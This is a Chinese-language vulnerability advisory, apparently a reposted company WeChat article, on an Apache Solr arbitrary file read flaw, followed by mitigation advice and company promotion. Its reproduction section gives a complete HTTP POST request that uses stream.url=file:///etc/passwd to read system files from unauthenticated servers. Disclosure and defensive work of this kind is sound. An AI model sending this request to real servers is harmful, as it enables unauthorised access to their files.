漏洞描述
Apache Solr是一个开源的搜索服务,使用Java语言开发。Apache Solr存在任意文件读取漏洞,在未开启认证的情况下,攻击者可利用Config API远程开启特定配置,并读取任意系统文件。
漏洞复现
访问url:http://ip:端口
/solr/admin/cores?indexInfo=false&wt=json
截取数据包
修改返回包 POST http://ip:port/solr/这里是status中的name/debug/dump?param=ContentStreams
--------------------
POST http://ip:port/solr/zicha_core/debug/dump?param=ContentStreams HTTP/1.1
Host: ip:port
user-agent: Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X10_7_3; Trident/6.0)
accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
accept-Encoding: gzip, deflate
Content-Length: 31
Content-Type: application/x-www-form-urlencoded
stream.url=file:///etc/passwd
--------------------
注意加上:Content-Type:application/x-www-form-urlencoded
影响版本
Apache Solr <= 8.8.1(全版本)
安全建议
由于目前官方不予修复该漏洞,暂无安全版本。
1. 开启身份验证/授权,参考官方文档:https://lucene.apache.org/solr/guide/8_6/authentication-and-authorization-plugins.html
2. 配置防火墙策略,确保SolrAPI(包括Admin UI)只有受信任的IP和用户才能访问。
内蒙古天大天财信息技术有限责任公司,成立于1999年,是集网络安全服务、安全集成、计算机系统集成、公共安全技术防范系统设计|施工|维修为一体的综合性高科技信息公司
专注产生价值,天大天财致力于做内蒙古网络安全设计、实施、运维服务综合实力最强的本土品牌,我们潜心了解客户业务需求及痛点,注重提升与客户的粘合度,赢得了客户与市场的认可,享有很好的商誉;我们坚持以技术实施、服务为基础,注重技术团队的培养与提升,拥有一支技术过硬的服务团队,能够为全区客户提供及时的应急支援服务,同时,为了能够为客户做更优质更有水准的安全服务,我们成立了天大天财安全实验室,推出了自己的安全服务产品,收到客户的高度认可。
2018年被评为内蒙古网络安全行业协会理事长单位,获得内蒙古自治区科技型企业资质以及高新技术企业证书,涉密资质由原来的三项(集成、运维、安防)新增一项国家秘密载体印制资质证书
原文始发于微信公众号(天大天财):Apache-Solr 任意文件读取漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论